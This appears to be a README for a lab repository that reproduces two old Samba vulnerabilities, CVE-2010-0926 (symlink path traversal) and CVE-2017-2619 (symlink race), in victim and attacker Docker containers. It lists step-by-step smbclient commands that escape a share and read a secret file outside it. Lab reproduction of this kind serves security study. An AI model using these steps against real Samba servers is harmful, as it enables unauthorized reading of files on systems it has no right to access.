vulnsamba

This repo contains proof of concept exploits for 2 CVEs on old versions of samba.
For each CVE, there are two docker containers: victim and attacker.

Table of contents

• CVE-2010-0926
  • Information and links
  • Containers description
  • Instructions to reproduce
• CVE-2017-2619
  • Information and links
  • Containers description
  • Instructions to reproduce

CVE-2010-0926

Information and links

More on mitre: CVE-2010-0926
Category: CWE-22 Path Traversal
Vulnerable version: samba-3.4.5
Exploit was taken from: https://www.exploit-db.com/exploits/33599
Another guide that helped me in creating this one: https://github.com/roughiz/Symlink-Directory-Traversal-smb-manually

Containers description

• victim container contains samba-3.4.5, which was built from the sources, and configured to have two shares: public and private
• attacker container contains patched version of samba-3.4.5 client, which allows creating symlinks to outside of a share

Instructions to reproduce

1. Pull the needed images from dockerhub
   docker pull kezzyhko/cve-2010-0926_victim
docker pull kezzyhko/cve-2010-0926_attacker

2. Run the vulnerable server
   docker run -it --name cve-2010-0926_victim kezzyhko/cve-2010-0926_victim
   You may see no sign of anything happening, but that's ok, smbd should have started working in the background

3. Find out the server container's ip
   docker inspect -f '{{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}}' cve-2010-0926_victim
   Remember it, we will need it to connect to the server

4. Run the attacker container
   docker run -it --name cve-2010-0926_attacker kezzyhko/cve-2010-0926_attacker

5. In the attacker container, connect to the server as a guest using smbclient
smbclient -N \\\\<ip>\\public
   Note, that \ characters are repeated twice, because they need to be escaped

6. Create the symlink to the root (or any other folder outside share)
   symlink / rootfs

7. Finally, get the secret from the private share
   cd rootfs
cd private
get secret.txt
exit
cat secret.txt
   You should see the following string: You f0und 7he s3cret!

CVE-2017-2619

Information and links

More on mitre: CVE-2017-2619
Categories: CWE-59 Link Following and CWE-362 Race Condition
Vulnerable version: samba-4.5.2
Exploit was taken from: https://www.exploit-db.com/exploits/41740

Containers description

• victim container contains:
  • samba-4.5.2, which was built from the sources
  • configuration to have public share
  • \secret - file inside the root directory
• attacker container contains patched version of samba-4.5.2 client. Patch adds two commands to smbclient:
  • rename_loop <src1> <src2> <dest> - infinite loop, which renames <src*> to <dest> and then back, so that <dest> will constantly switch between being <src1> and <src2>
  • dump <file> - infinite loop, which constantly tries to output <file>'s contents and ignores errors

Instructions to reproduce

1. Pull the needed images from dockerhub
   docker pull kezzyhko/cve-2017-2619_victim
docker pull kezzyhko/cve-2017-2619_attacker

2. Run the vulnerable server
   docker run -it --name cve-2017-2619_victim --cap-add=SYS_PTRACE --security-opt seccomp=unconfined kezzyhko/cve-2017-2619_victim
   Here we need to supply additional parameters to be able to use strace -p later.
   You may see no sign of anything happening, but that's ok, smbd should have started working in the background.

3. Find out the server container's ip
   docker inspect -f '{{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}}' cve-2017-2619_victim
   Remember it, we will need it to connect to the server

4. Renaming side of the attack

   1. Run the first attacker container
      docker run --rm -it --name cve-2017-2619_attacker_1 kezzyhko/cve-2017-2619_attacker

   2. In the attacker_1 container, create an empty file, we will need it later
      touch empty

   3. Connect to the server as a guest using smbclient
smbclient -N \\\\<ip>\\public
      Note, that \ characters are repeated twice, because they need to be escaped

   4. Enable posix features
      posix

   5. Create the symlink to the root directory
      symlink / link

   6. Create the normal directory
      mkdir dir

   7. Create the empty file inside the normal directory, and name it secret
put empty dir/secret

   8. Start the renaming loop
      rename_loop link dir switching

5. Reading side of the attack

   1. Run the second attacker container and connect to the server
      docker run --rm -it --name cve-2017-2619_attacker_2 kezzyhko/cve-2017-2619_attacker
smbclient -N \\\\<ip>\\public

   2. Inside the attacker_2 container, start the reading loop
      dump switching/secret
      

   3. Some explanation
      At this point, out attacker_2 client is reading from switching/secret, which might be either link/secret or dir/secret. Theoretically, smbd on the victim container might check that reading from switching is ok, since it is just dir inside the share, but then our attacker_1 will change switching to be the link, and victim will read from link/secret, which is equivalent to just /secret outside the public share.
      However, it is not very likely for this to happen, and it may take a long time to wait. For the sake of PoC, we will slow down the attacker_2

   4. find out the pid of smbd process, which handles the attacker_2
      For this, run ps aux in the victim container. The pid we are looking for should be the largest pid with smbd -D command.

   5. Artificially slow down the process
      strace -p<pid>

   6. Now, look at the output in attacker_2 process. You should see the following string: You f0und 7he s3cret!